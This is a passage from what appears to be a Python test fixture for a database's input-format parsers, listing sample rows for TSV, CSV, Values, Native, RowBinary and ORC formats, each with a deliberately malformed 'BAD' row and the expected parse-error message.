'0\t0\tAM\t0.5\t1\n',
'1\t0\tAM\t0.5\t1\n2\t0\tAM\t0.5\t1\n3\t0\tAM\t0.5\t1\n4\t0\tAM\t0.5\t1\n5\t0\tAM\t0.5\t1\n6\t0\tAM\t0.5\t1\n7\t0\tAM\t0.5\t1\n8\t0\tAM\t0.5\t1\n9\t0\tAM\t0.5\t1\n10\t0\tAM\t0.5\t1\n11\t0\tAM\t0.5\t1\n12\t0\tAM\t0.5\t1\n13\t0\tAM\t0.5\t1\n14\t0\tAM\t0.5\t1\n15\t0\tAM\t0.5\t1\n',
'0\t0\tAM\t0.5\t1\n',
# broken message
'0\tBAD\tAM\t0.5\t1\n',
],
'expected':'''{"raw_message":"0\\tBAD\\tAM\\t0.5\\t1\\n","error":"Cannot parse input: expected '\\\\t' before: 'BAD\\\\tAM\\\\t0.5\\\\t1\\\\n': Could not print diagnostic info because two last rows aren't in buffer (rare case)\\n"}''',
'supports_empty_value': True,
'printable':True,
},
'CSVWithNames': {
'data_sample': [
'"id","blockNo","val1","val2","val3"\n0,0,"AM",0.5,1\n',
'"id","blockNo","val1","val2","val3"\n1,0,"AM",0.5,1\n2,0,"AM",0.5,1\n3,0,"AM",0.5,1\n4,0,"AM",0.5,1\n5,0,"AM",0.5,1\n6,0,"AM",0.5,1\n7,0,"AM",0.5,1\n8,0,"AM",0.5,1\n9,0,"AM",0.5,1\n10,0,"AM",0.5,1\n11,0,"AM",0.5,1\n12,0,"AM",0.5,1\n13,0,"AM",0.5,1\n14,0,"AM",0.5,1\n15,0,"AM",0.5,1\n',
'"id","blockNo","val1","val2","val3"\n0,0,"AM",0.5,1\n',
# broken message
'"id","blockNo","val1","val2","val3"\n0,"BAD","AM",0.5,1\n',
],
'expected':'''{"raw_message":"\\"id\\",\\"blockNo\\",\\"val1\\",\\"val2\\",\\"val3\\"\\n0,\\"BAD\\",\\"AM\\",0.5,1\\n","error":"Cannot parse input: expected '\\"' before: 'BAD\\",\\"AM\\",0.5,1\\\\n': Could not print diagnostic info because two last rows aren't in buffer (rare case)\\n"}''',
'printable':True,
},
'Values': {
'data_sample': [
"(0,0,'AM',0.5,1)",
"(1,0,'AM',0.5,1),(2,0,'AM',0.5,1),(3,0,'AM',0.5,1),(4,0,'AM',0.5,1),(5,0,'AM',0.5,1),(6,0,'AM',0.5,1),(7,0,'AM',0.5,1),(8,0,'AM',0.5,1),(9,0,'AM',0.5,1),(10,0,'AM',0.5,1),(11,0,'AM',0.5,1),(12,0,'AM',0.5,1),(13,0,'AM',0.5,1),(14,0,'AM',0.5,1),(15,0,'AM',0.5,1)",
"(0,0,'AM',0.5,1)",
# broken message
"(0,'BAD','AM',0.5,1)",
],
'expected':r'''{"raw_message":"(0,'BAD','AM',0.5,1)","error":"Cannot parse string 'BAD' as UInt16: syntax error at begin of string. Note: there are toUInt16OrZero and toUInt16OrNull functions, which returns zero\/NULL instead of throwing exception.: while executing 'FUNCTION CAST(assumeNotNull(_dummy_0) :: 2, 'UInt16' :: 1) -> CAST(assumeNotNull(_dummy_0), 'UInt16') UInt16 : 4'"}''',
'supports_empty_value': True,
'printable':True,
},
'TSVWithNames': {
'data_sample': [
'id\tblockNo\tval1\tval2\tval3\n0\t0\tAM\t0.5\t1\n',
'id\tblockNo\tval1\tval2\tval3\n1\t0\tAM\t0.5\t1\n2\t0\tAM\t0.5\t1\n3\t0\tAM\t0.5\t1\n4\t0\tAM\t0.5\t1\n5\t0\tAM\t0.5\t1\n6\t0\tAM\t0.5\t1\n7\t0\tAM\t0.5\t1\n8\t0\tAM\t0.5\t1\n9\t0\tAM\t0.5\t1\n10\t0\tAM\t0.5\t1\n11\t0\tAM\t0.5\t1\n12\t0\tAM\t0.5\t1\n13\t0\tAM\t0.5\t1\n14\t0\tAM\t0.5\t1\n15\t0\tAM\t0.5\t1\n',
'id\tblockNo\tval1\tval2\tval3\n0\t0\tAM\t0.5\t1\n',
# broken message
'id\tblockNo\tval1\tval2\tval3\n0\tBAD\tAM\t0.5\t1\n',
],
'expected':'''{"raw_message":"id\\tblockNo\\tval1\\tval2\\tval3\\n0\\tBAD\\tAM\\t0.5\\t1\\n","error":"Cannot parse input: expected '\\\\t' before: 'BAD\\\\tAM\\\\t0.5\\\\t1\\\\n': Could not print diagnostic info because two last rows aren't in buffer (rare case)\\n"}''',
'supports_empty_value': True,
'printable':True,
},
'TSVWithNamesAndTypes': {
'data_sample': [
'id\tblockNo\tval1\tval2\tval3\nInt64\tUInt16\tString\tFloat32\tUInt8\n0\t0\tAM\t0.5\t1\n',
'id\tblockNo\tval1\tval2\tval3\nInt64\tUInt16\tString\tFloat32\tUInt8\n1\t0\tAM\t0.5\t1\n2\t0\tAM\t0.5\t1\n3\t0\tAM\t0.5\t1\n4\t0\tAM\t0.5\t1\n5\t0\tAM\t0.5\t1\n6\t0\tAM\t0.5\t1\n7\t0\tAM\t0.5\t1\n8\t0\tAM\t0.5\t1\n9\t0\tAM\t0.5\t1\n10\t0\tAM\t0.5\t1\n11\t0\tAM\t0.5\t1\n12\t0\tAM\t0.5\t1\n13\t0\tAM\t0.5\t1\n14\t0\tAM\t0.5\t1\n15\t0\tAM\t0.5\t1\n',
'id\tblockNo\tval1\tval2\tval3\nInt64\tUInt16\tString\tFloat32\tUInt8\n0\t0\tAM\t0.5\t1\n',
# broken message
'id\tblockNo\tval1\tval2\tval3\nInt64\tUInt16\tString\tFloat32\tUInt8\n0\tBAD\tAM\t0.5\t1\n',
],
'expected':'''{"raw_message":"id\\tblockNo\\tval1\\tval2\\tval3\\nInt64\\tUInt16\\tString\\tFloat32\\tUInt8\\n0\\tBAD\\tAM\\t0.5\\t1\\n","error":"Cannot parse input: expected '\\\\t' before: 'BAD\\\\tAM\\\\t0.5\\\\t1\\\\n': Could not print diagnostic info because two last rows aren't in buffer (rare case)\\n"}''',
'printable':True,
},
'Native': {
'data_sample': [
b'\x05\x01\x02\x69\x64\x05\x49\x6e\x74\x36\x34\x00\x00\x00\x00\x00\x00\x00\x00\x07\x62\x6c\x6f\x63\x6b\x4e\x6f\x06\x55\x49\x6e\x74\x31\x36\x00\x00\x04\x76\x61\x6c\x31\x06\x53\x74\x72\x69\x6e\x67\x02\x41\x4d\x04\x76\x61\x6c\x32\x07\x46\x6c\x6f\x61\x74\x33\x32\x00\x00\x00\x3f\x04\x76\x61\x6c\x33\x05\x55\x49\x6e\x74\x38\x01',
b'\x05\x0f\x02\x69\x64\x05\x49\x6e\x74\x36\x34\x01\x00\x00\x00\x00\x00\x00\x00\x02\x00\x00\x00\x00\x00\x00\x00\x03\x00\x00\x00\x00\x00\x00\x00\x04\x00\x00\x00\x00\x00\x00\x00\x05\x00\x00\x00\x00\x00\x00\x00\x06\x00\x00\x00\x00\x00\x00\x00\x07\x00\x00\x00\x00\x00\x00\x00\x08\x00\x00\x00\x00\x00\x00\x00\x09\x00\x00\x00\x00\x00\x00\x00\x0a\x00\x00\x00\x00\x00\x00\x00\x0b\x00\x00\x00\x00\x00\x00\x00\x0c\x00\x00\x00\x00\x00\x00\x00\x0d\x00\x00\x00\x00\x00\x00\x00\x0e\x00\x00\x00\x00\x00\x00\x00\x0f\x00\x00\x00\x00\x00\x00\x00\x07\x62\x6c\x6f\x63\x6b\x4e\x6f\x06\x55\x49\x6e\x74\x31\x36\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x04\x76\x61\x6c\x31\x06\x53\x74\x72\x69\x6e\x67\x02\x41\x4d\x02\x41\x4d\x02\x41\x4d\x02\x41\x4d\x02\x41\x4d\x02\x41\x4d\x02\x41\x4d\x02\x41\x4d\x02\x41\x4d\x02\x41\x4d\x02\x41\x4d\x02\x41\x4d\x02\x41\x4d\x02\x41\x4d\x02\x41\x4d\x04\x76\x61\x6c\x32\x07\x46\x6c\x6f\x61\x74\x33\x32\x00\x00\x00\x3f\x00\x00\x00\x3f\x00\x00\x00\x3f\x00\x00\x00\x3f\x00\x00\x00\x3f\x00\x00\x00\x3f\x00\x00\x00\x3f\x00\x00\x00\x3f\x00\x00\x00\x3f\x00\x00\x00\x3f\x00\x00\x00\x3f\x00\x00\x00\x3f\x00\x00\x00\x3f\x00\x00\x00\x3f\x00\x00\x00\x3f\x04\x76\x61\x6c\x33\x05\x55\x49\x6e\x74\x38\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01',
b'\x05\x01\x02\x69\x64\x05\x49\x6e\x74\x36\x34\x00\x00\x00\x00\x00\x00\x00\x00\x07\x62\x6c\x6f\x63\x6b\x4e\x6f\x06\x55\x49\x6e\x74\x31\x36\x00\x00\x04\x76\x61\x6c\x31\x06\x53\x74\x72\x69\x6e\x67\x02\x41\x4d\x04\x76\x61\x6c\x32\x07\x46\x6c\x6f\x61\x74\x33\x32\x00\x00\x00\x3f\x04\x76\x61\x6c\x33\x05\x55\x49\x6e\x74\x38\x01',
# broken message
b'\x05\x01\x02\x69\x64\x05\x49\x6e\x74\x36\x34\x00\x00\x00\x00\x00\x00\x00\x00\x07\x62\x6c\x6f\x63\x6b\x4e\x6f\x06\x53\x74\x72\x69\x6e\x67\x03\x42\x41\x44\x04\x76\x61\x6c\x31\x06\x53\x74\x72\x69\x6e\x67\x02\x41\x4d\x04\x76\x61\x6c\x32\x07\x46\x6c\x6f\x61\x74\x33\x32\x00\x00\x00\x3f\x04\x76\x61\x6c\x33\x05\x55\x49\x6e\x74\x38\x01',
],
'expected':'''{"raw_message":"050102696405496E743634000000000000000007626C6F636B4E6F06537472696E67034241440476616C3106537472696E6702414D0476616C3207466C6F617433320000003F0476616C330555496E743801","error":"Cannot convert: String to UInt16"}''',
'printable':False,
},
'RowBinary': {
'data_sample': [
b'\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x02\x41\x4d\x00\x00\x00\x3f\x01',
b'\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x02\x41\x4d\x00\x00\x00\x3f\x01\x02\x00\x00\x00\x00\x00\x00\x00\x00\x00\x02\x41\x4d\x00\x00\x00\x3f\x01\x03\x00\x00\x00\x00\x00\x00\x00\x00\x00\x02\x41\x4d\x00\x00\x00\x3f\x01\x04\x00\x00\x00\x00\x00\x00\x00\x00\x00\x02\x41\x4d\x00\x00\x00\x3f\x01\x05\x00\x00\x00\x00\x00\x00\x00\x00\x00\x02\x41\x4d\x00\x00\x00\x3f\x01\x06\x00\x00\x00\x00\x00\x00\x00\x00\x00\x02\x41\x4d\x00\x00\x00\x3f\x01\x07\x00\x00\x00\x00\x00\x00\x00\x00\x00\x02\x41\x4d\x00\x00\x00\x3f\x01\x08\x00\x00\x00\x00\x00\x00\x00\x00\x00\x02\x41\x4d\x00\x00\x00\x3f\x01\x09\x00\x00\x00\x00\x00\x00\x00\x00\x00\x02\x41\x4d\x00\x00\x00\x3f\x01\x0a\x00\x00\x00\x00\x00\x00\x00\x00\x00\x02\x41\x4d\x00\x00\x00\x3f\x01\x0b\x00\x00\x00\x00\x00\x00\x00\x00\x00\x02\x41\x4d\x00\x00\x00\x3f\x01\x0c\x00\x00\x00\x00\x00\x00\x00\x00\x00\x02\x41\x4d\x00\x00\x00\x3f\x01\x0d\x00\x00\x00\x00\x00\x00\x00\x00\x00\x02\x41\x4d\x00\x00\x00\x3f\x01\x0e\x00\x00\x00\x00\x00\x00\x00\x00\x00\x02\x41\x4d\x00\x00\x00\x3f\x01\x0f\x00\x00\x00\x00\x00\x00\x00\x00\x00\x02\x41\x4d\x00\x00\x00\x3f\x01',
b'\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x02\x41\x4d\x00\x00\x00\x3f\x01',
# broken message
b'\x00\x00\x00\x00\x00\x00\x00\x00\x03\x42\x41\x44\x02\x41\x4d\x00\x00\x00\x3f\x01',
],
'expected':'{"raw_message":"00000000000000000342414402414D0000003F01","error":"Cannot read all data. Bytes read: 9. Bytes expected: 65.: (at row 1)\\n"}',
'printable':False,
},
'RowBinaryWithNamesAndTypes': {
'data_sample': [
b'\x05\x02\x69\x64\x07\x62\x6c\x6f\x63\x6b\x4e\x6f\x04\x76\x61\x6c\x31\x04\x76\x61\x6c\x32\x04\x76\x61\x6c\x33\x05\x49\x6e\x74\x36\x34\x06\x55\x49\x6e\x74\x31\x36\x06\x53\x74\x72\x69\x6e\x67\x07\x46\x6c\x6f\x61\x74\x33\x32\x05\x55\x49\x6e\x74\x38\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x02\x41\x4d\x00\x00\x00\x3f\x01',
b'\x05\x02\x69\x64\x07\x62\x6c\x6f\x63\x6b\x4e\x6f\x04\x76\x61\x6c\x31\x04\x76\x61\x6c\x32\x04\x76\x61\x6c\x33\x05\x49\x6e\x74\x36\x34\x06\x55\x49\x6e\x74\x31\x36\x06\x53\x74\x72\x69\x6e\x67\x07\x46\x6c\x6f\x61\x74\x33\x32\x05\x55\x49\x6e\x74\x38\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x02\x41\x4d\x00\x00\x00\x3f\x01\x02\x00\x00\x00\x00\x00\x00\x00\x00\x00\x02\x41\x4d\x00\x00\x00\x3f\x01\x03\x00\x00\x00\x00\x00\x00\x00\x00\x00\x02\x41\x4d\x00\x00\x00\x3f\x01\x04\x00\x00\x00\x00\x00\x00\x00\x00\x00\x02\x41\x4d\x00\x00\x00\x3f\x01\x05\x00\x00\x00\x00\x00\x00\x00\x00\x00\x02\x41\x4d\x00\x00\x00\x3f\x01\x06\x00\x00\x00\x00\x00\x00\x00\x00\x00\x02\x41\x4d\x00\x00\x00\x3f\x01\x07\x00\x00\x00\x00\x00\x00\x00\x00\x00\x02\x41\x4d\x00\x00\x00\x3f\x01\x08\x00\x00\x00\x00\x00\x00\x00\x00\x00\x02\x41\x4d\x00\x00\x00\x3f\x01\x09\x00\x00\x00\x00\x00\x00\x00\x00\x00\x02\x41\x4d\x00\x00\x00\x3f\x01\x0a\x00\x00\x00\x00\x00\x00\x00\x00\x00\x02\x41\x4d\x00\x00\x00\x3f\x01\x0b\x00\x00\x00\x00\x00\x00\x00\x00\x00\x02\x41\x4d\x00\x00\x00\x3f\x01\x0c\x00\x00\x00\x00\x00\x00\x00\x00\x00\x02\x41\x4d\x00\x00\x00\x3f\x01\x0d\x00\x00\x00\x00\x00\x00\x00\x00\x00\x02\x41\x4d\x00\x00\x00\x3f\x01\x0e\x00\x00\x00\x00\x00\x00\x00\x00\x00\x02\x41\x4d\x00\x00\x00\x3f\x01\x0f\x00\x00\x00\x00\x00\x00\x00\x00\x00\x02\x41\x4d\x00\x00\x00\x3f\x01',
b'\x05\x02\x69\x64\x07\x62\x6c\x6f\x63\x6b\x4e\x6f\x04\x76\x61\x6c\x31\x04\x76\x61\x6c\x32\x04\x76\x61\x6c\x33\x05\x49\x6e\x74\x36\x34\x06\x55\x49\x6e\x74\x31\x36\x06\x53\x74\x72\x69\x6e\x67\x07\x46\x6c\x6f\x61\x74\x33\x32\x05\x55\x49\x6e\x74\x38\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x02\x41\x4d\x00\x00\x00\x3f\x01',
# broken message
b'\x05\x02\x69\x64\x07\x62\x6c\x6f\x63\x6b\x4e\x6f\x04\x76\x61\x6c\x31\x04\x76\x61\x6c\x32\x04\x76\x61\x6c\x33\x05\x49\x6e\x74\x36\x34\x06\x53\x74\x72\x69\x6e\x67\x06\x53\x74\x72\x69\x6e\x67\x07\x46\x6c\x6f\x61\x74\x33\x32\x05\x55\x49\x6e\x74\x38\x00\x00\x00\x00\x00\x00\x00\x00\x03\x42\x41\x44\x02\x41\x4d\x00\x00\x00\x3f\x01',
],
'expected':'{"raw_message":"0502696407626C6F636B4E6F0476616C310476616C320476616C3305496E74363406537472696E6706537472696E6707466C6F617433320555496E743800000000000000000342414402414D0000003F01","error":"Cannot read all data. Bytes read: 9. Bytes expected: 65.: (at row 1)\\n"}',
'printable':False,
},
'ORC': {
'data_sample': [
b'\x4f\x52\x43\x11\x00\x00\x0a\x06\x12\x04\x08\x01\x50\x00\x2b\x00\x00\x0a\x13\x0a\x03\x00\x00\x00\x12\x0c\x08\x01\x12\x06\x08\x00\x10\x00\x18\x00\x50\x00\x30\x00\x00\xe3\x12\xe7\x62\x65\x00\x01\x21\x3e\x0e\x46\x25\x0e\x2e\x46\x03\x21\x46\x03\x09\xa6\x00\x06\x00\x32\x00\x00\xe3\x92\xe4\x62\x65\x00\x01\x21\x01\x0e\x46\x25\x2e\x2e\x26\x47\x5f\x21\x20\x96\x60\x09\x60\x00\x00\x36\x00\x00\xe3\x92\xe1\x62\x65\x00\x01\x21\x61\x0e\x46\x23\x5e\x2e\x46\x03\x21\x66\x03\x3d\x53\x29\x10\x11\xc0\x00\x00\x2b\x00\x00\x0a\x13\x0a\x03\x00\x00\x00\x12\x0c\x08\x01\x12\x06\x08\x02\x10\x02\x18\x02\x50\x00\x05\x00\x00\xff\x00\x03\x00\x00\x30\x07\x00\x00\x40\x00\x80\x05\x00\x00\x41\x4d\x07\x00\x00\x42\x00\x80\x03\x00\x00\x0a\x07\x00\x00\x42\x00\x80\x05\x00\x00\xff\x01\x88\x00\x00\x4d\xca\xc1\x0a\x80\x30\x0c\x03\xd0\x2e\x6b\xcb\x98\x17\xf1\x14\x50\xfc\xff\xcf\xb4\x66\x1e\x3c\x84\x47\x9a\xce\x1c\xb9\x1b\xb7\xf9\xda\x48\x09\x9e\xb2\xf3\x92\xce\x5b\x86\xf6\x56\x7f\x21\x41\x2f\x51\xa6\x7a\xd7\x1d\xe5\xea\xae\x3d\xca\xd5\x83\x71\x60\xd8\x17\xfc\x62\x0f\xa8\x00\x00\xe3\x4a\xe6\x62\xe1\x60\x0c\x60\xe0\xe2\xe3\x60\x14\x62\xe3\x60\x10\x60\x90\x60\x08\x60\x88\x60\xe5\x12\xe0\x60\x54\xe2\xe0\x62\x34\x10\x62\x34\x90\x60\x02\x8a\x70\x71\x09\x01\x45\xb8\xb8\x98\x1c\x7d\x85\x80\x58\x82\x05\x28\xc6\xcd\x25\xca\xc1\x68\xc4\x0b\x52\xc5\x6c\xa0\x67\x2a\x05\x22\xc0\x4a\x21\x86\x31\x09\x30\x81\xb5\xb2\x02\x00\x36\x01\x00\x25\x8c\xbd\x0a\xc2\x30\x14\x85\x73\x6f\x92\xf6\x92\x6a\x09\x01\x21\x64\x92\x4e\x75\x91\x58\x71\xc9\x64\x27\x5d\x2c\x1d\x5d\xfd\x59\xc4\x42\x37\x5f\xc0\x17\xe8\x23\x9b\xc6\xe1\x3b\x70\x0f\xdf\xb9\xc4\xf5\x17\x5d\x41\x5c\x4f\x60\x37\xeb\x53\x0d\x55\x4d\x0b\x23\x01\xb9\x90\x2e\xbf\x0f\xe3\xe3\xdd\x8d\x0e\x5f\x4f\x27\x3e\xb7\x61\x97\xb2\x49\xb9\xaf\x90\x20\x92\x27\x32\x2a\x6b\xf4\xf3\x0d\x1e\x82\x20\xe8\x59\x28\x09\x4c\x46\x4c\x33\xcb\x7a\x76\x95\x41\x47\x9f\x14\x78\x03\xde\x62\x6c\x54\x30\xb1\x51\x0a\xdb\x8b\x89\x58\x11\xbb\x22\xac\x08\x9a\xe5\x6c\x71\xbf\x3d\xb8\x39\x92\xfa\x7f\x86\x1a\xd3\x54\x1e\xa7\xee\xcc\x7e\x08\x9e\x01\x10\x01\x18\x80\x80\x10\x22\x02\x00\x0c\x28\x57\x30\x06\x82\xf4\x03\x03\x4f\x52\x43\x18',
b'\x4f\x52\x43\x11\x00\x00\x0a\x06\x12\x04\x08\x0f\x50\x00\x2b\x00\x00\x0a\x13\x0a\x03\x00\x00\x00\x12\x0c\x08\x0f\x12\x06\x08\x00\x10\x00\x18\x00\x50\x00\x30\x00\x00\xe3\x12\xe7\x62\x65\x00\x01\x21\x3e\x0e\x7e\x25\x0e\x2e\x46\x43\x21\x46\x4b\x09\xad\x00\x06\x00\x33\x00\x00\x0a\x17\x0a\x03\x00\x00\x00\x12\x10\x08\x0f\x22\x0a\x0a\x02\x41\x4d\x12\x02\x41\x4d\x18\x3c\x50\x00\x3a\x00\x00\xe3\x92\xe1\x62\x65\x00\x01\x21\x61\x0e\x7e\x23\x5e\x2e\x46\x03\x21\x66\x03\x3d\x53\x29\x66\x73\x3d\xd3\x00\x06\x00\x2b\x00\x00\x0a\x13\x0a\x03\x00\x00\x00\x12\x0c\x08\x0f\x12\x06\x08\x02\x10\x02\x18\x1e\x50\x00\x05\x00\x00\x0c\x00\x2b\x00\x00\x31\x32\x33\x34\x35\x36\x37\x38\x39\x31\x30\x31\x31\x31\x32\x31\x33\x31\x34\x31\x35\x09\x00\x00\x06\x01\x03\x02\x09\x00\x00\xc0\x0e\x00\x00\x07\x00\x00\x42\x00\x80\x05\x00\x00\x41\x4d\x0a\x00\x00\xe3\xe2\x42\x01\x00\x09\x00\x00\xc0\x0e\x02\x00\x05\x00\x00\x0c\x01\x94\x00\x00\x2d\xca\xc1\x0e\x80\x30\x08\x03\xd0\xc1\x60\x2e\xf3\x62\x76\x6a\xe2\x0e\xfe\xff\x57\x5a\x3b\x0f\xe4\x51\xe8\x68\xbd\x5d\x05\xe7\xf8\x34\x40\x3a\x6e\x59\xb1\x64\xe0\x91\xa9\xbf\xb1\x97\xd2\x95\x9d\x1e\xca\x55\x3a\x6d\xb4\xd2\xdd\x0b\x74\x9a\x74\xf7\x12\x39\xbd\x97\x7f\x7c\x06\xbb\xa6\x8d\x97\x17\xb4\x00\x00\xe3\x4a\xe6\x62\xe1\xe0\x0f\x60\xe0\xe2\xe3\xe0\x17\x62\xe3\x60\x10\x60\x90\x60\x08\x60\x88\x60\xe5\x12\xe0\xe0\x57\xe2\xe0\x62\x34\x14\x62\xb4\x94\xd0\x02\x8a\xc8\x73\x09\x01\x45\xb8\xb8\x98\x1c\x7d\x85\x80\x58\xc2\x06\x28\x26\xc4\x25\xca\xc1\x6f\xc4\xcb\xc5\x68\x20\xc4\x6c\xa0\x67\x2a\xc5\x6c\xae\x67\x0a\x14\xe6\x87\x1a\xc6\x24\xc0\x24\x21\x07\x32\x0c\x00\x4a\x01\x00\xe3\x60\x16\x58\xc3\x24\xc5\xcd\xc1\x2c\x30\x89\x51\xc2\x4b\xc1\x57\x83\x5f\x49\x83\x83\x47\x88\x95\x91\x89\x99\x85\x55\x8a\x3d\x29\x27\x3f\x39\xdb\x2f\x5f\x8a\x29\x33\x45\x8a\xa5\x2c\x31\xc7\x10\x4c\x1a\x81\x49\x63\x25\x26\x0e\x46\x20\x66\x07\x63\x36\x0e\x3e\x0d\x26\x03\x10\x9f\xd1\x80\xdf\x8a\x85\x83\x3f\x80\xc1\x8a\x8f\x83\x5f\x88\x8d\x83\x41\x80\x41\x82\x21\x80\x21\x82\xd5\x4a\x80\x83\x5f\x89\x83\x8b\xd1\x50\x88\xd1\x52\x42\x0b\x28\x22\x6f\x25\x04\x14\xe1\xe2\x62\x72\xf4\x15\x02\x62\x09\x1b\xa0\x98\x90\x95\x28\x07\xbf\x11\x2f\x17\xa3\x81\x10\xb3\x81\x9e\xa9\x14\xb3\xb9\x9e\x29\x50\x98\x1f\x6a\x18\x93\x00\x93\x84\x1c\xc8\x30\x87\x09\x7e\x1e\x0c\x00\x08\xa8\x01\x10\x01\x18\x80\x80\x10\x22\x02\x00\x0c\x28\x5d\x30\x06\x82\xf4\x03\x03\x4f\x52\x43\x18',
b'\x4f\x52\x43\x11\x00\x00\x0a\x06\x12\x04\x08\x01\x50\x00\x2b\x00\x00\x0a\x13\x0a\x03\x00\x00\x00\x12\x0c\x08\x01\x12\x06\x08\x00\x10\x00\x18\x00\x50\x00\x30\x00\x00\xe3\x12\xe7\x62\x65\x00\x01\x21\x3e\x0e\x46\x25\x0e\x2e\x46\x03\x21\x46\x03\x09\xa6\x00\x06\x00\x32\x00\x00\xe3\x92\xe4\x62\x65\x00\x01\x21\x01\x0e\x46\x25\x2e\x2e\x26\x47\x5f\x21\x20\x96\x60\x09\x60\x00\x00\x36\x00\x00\xe3\x92\xe1\x62\x65\x00\x01\x21\x61\x0e\x46\x23\x5e\x2e\x46\x03\x21\x66\x03\x3d\x53\x29\x10\x11\xc0\x00\x00\x2b\x00\x00\x0a\x13\x0a\x03\x00\x00\x00\x12\x0c\x08\x01\x12\x06\x08\x02\x10\x02\x18\x02\x50\x00\x05\x00\x00\xff\x00\x03\x00\x00\x30\x07\x00\x00\x40\x00\x80\x05\x00\x00\x41\x4d\x07\x00\x00\x42\x00\x80\x03\x00\x00\x0a\x07\x00\x00\x42\x00\x80\x05\x00\x00\xff\x01\x88\x00\x00\x4d\xca\xc1\x0a\x80\x30\x0c\x03\xd0\x2e\x6b\xcb\x98\x17\xf1\x14\x50\xfc\xff\xcf\xb4\x66\x1e\x3c\x84\x47\x9a\xce\x1c\xb9\x1b\xb7\xf9\xda\x48\x09\x9e\xb2\xf3\x92\xce\x5b\x86\xf6\x56\x7f\x21\x41\x2f\x51\xa6\x7a\xd7\x1d\xe5\xea\xae\x3d\xca\xd5\x83\x71\x60\xd8\x17\xfc\x62\x0f\xa8\x00\x00\xe3\x4a\xe6\x62\xe1\x60\x0c\x60\xe0\xe2\xe3\x60\x14\x62\xe3\x60\x10\x60\x90\x60\x08\x60\x88\x60\xe5\x12\xe0\x60\x54\xe2\xe0\x62\x34\x10\x62\x34\x90\x60\x02\x8a\x70\x71\x09\x01\x45\xb8\xb8\x98\x1c\x7d\x85\x80\x58\x82\x05\x28\xc6\xcd\x25\xca\xc1\x68\xc4\x0b\x52\xc5\x6c\xa0\x67\x2a\x05\x22\xc0\x4a\x21\x86\x31\x09\x30\x81\xb5\xb2\x02\x00\x36\x01\x00\x25\x8c\xbd\x0a\xc2\x30\x14\x85\x73\x6f\x92\xf6\x92\x6a\x09\x01\x21\x64\x92\x4e\x75\x91\x58\x71\xc9\x64\x27\x5d\x2c\x1d\x5d\xfd\x59\xc4\x42\x37\x5f\xc0\x17\xe8\x23\x9b\xc6\xe1\x3b\x70\x0f\xdf\xb9\xc4\xf5\x17\x5d\x41\x5c\x4f\x60\x37\xeb\x53\x0d\x55\x4d\x0b\x23\x01\xb9\x90\x2e\xbf\x0f\xe3\xe3\xdd\x8d\x0e\x5f\x4f\x27\x3e\xb7\x61\x97\xb2\x49\xb9\xaf\x90\x20\x92\x27\x32\x2a\x6b\xf4\xf3\x0d\x1e\x82\x20\xe8\x59\x28\x09\x4c\x46\x4c\x33\xcb\x7a\x76\x95\x41\x47\x9f\x14\x78\x03\xde\x62\x6c\x54\x30\xb1\x51\x0a\xdb\x8b\x89\x58\x11\xbb\x22\xac\x08\x9a\xe5\x6c\x71\xbf\x3d\xb8\x39\x92\xfa\x7f\x86\x1a\xd3\x54\x1e\xa7\xee\xcc\x7e\x08\x9e\x01\x10\x01\x18\x80\x80\x10\x22\x02\x00\x0c\x28\x57\x30\x06\x82\xf4\x03\x03\x4f\x52\x43\x18',
# broken message
b'\x4f\x52\x43\x0a\x0b\x0a\x03\x00\x00\x00\x12\x04\x08\x01\x50\x00\x0a\x15\x0a\x05\x00\x00\x00\x00\x00\x12\x0c\x08\x01\x12\x06\x08\x00\x10\x00\x18\x00\x50\x00\x0a\x12\x0a\x06\x00\x00\x00\x00\x00\x00\x12\x08\x08\x01\x42\x02\x08\x06\x50\x00\x0a\x12\x0a\x06\x00\x00\x00\x00\x00\x00\x12\x08\x08\x01\x42\x02\x08\x04\x50\x00\x0a\x29\x0a\x04\x00\x00\x00\x00\x12\x21\x08\x01\x1a\x1b\x09\x00\x00\x00\x00\x00\x00\xe0\x3f\x11\x00\x00\x00\x00\x00\x00\xe0\x3f\x19\x00\x00\x00\x00\x00\x00\xe0\x3f\x50\x00\x0a\x15\x0a\x05\x00\x00\x00\x00\x00\x12\x0c\x08\x01\x12\x06\x08\x02\x10\x02\x18\x02\x50\x00\xff\x80\xff\x80\xff\x00\xff\x80\xff\x03\x42\x41\x44\xff\x80\xff\x02\x41\x4d\xff\x80\x00\x00\x00\x3f\xff\x80\xff\x01\x0a\x06\x08\x06\x10\x00\x18\x0d\x0a\x06\x08\x06\x10\x01\x18\x17\x0a\x06\x08\x06\x10\x02\x18\x14\x0a\x06\x08\x06\x10\x03\x18\x14\x0a\x06\x08\x06\x10\x04\x18\x2b\x0a\x06\x08\x06\x10\x05\x18\x17\x0a\x06\x08\x00\x10\x00\x18\x02\x0a\x06\x08\x00\x10\x01\x18\x02\x0a\x06\x08\x01\x10\x01\x18\x02\x0a\x06\x08\x00\x10\x02\x18\x02\x0a\x06\x08\x02\x10\x02\x18\x02\x0a\x06\x08\x01\x10\x02\x18\x03\x0a\x06\x08\x00\x10\x03\x18\x02\x0a\x06\x08\x02\x10\x03\x18\x02\x0a\x06\x08\x01\x10\x03\x18\x02\x0a\x06\x08\x00\x10\x04\x18\x02\x0a\x06\x08\x01\x10\x04\x18\x04\x0a\x06\x08\x00\x10\x05\x18\x02\x0a\x06\x08\x01\x10\x05\x18\x02\x12\x04\x08\x00\x10\x00\x12\x04\x08\x00\x10\x00\x12\x04\x08\x00\x10\x00\x12\x04\x08\x00\x10\x00\x12\x04\x08\x00\x10\x00\x12\x04\x08\x00\x10\x00\x1a\x03\x47\x4d\x54\x0a\x59\x0a\x04\x08\x01\x50\x00\x0a\x0c\x08\x01\x12\x06\x08\x00\x10\x00\x18\x00\x50\x00\x0a\x08\x08\x01\x42\x02\x08\x06\x50\x00\x0a\x08\x08\x01\x42\x02\x08\x04\x50\x00\x0a\x21\x08\x01\x1a\x1b\x09\x00\x00\x00\x00\x00\x00\xe0\x3f\x11\x00\x00\x00\x00\x00\x00\xe0\x3f\x19\x00\x00\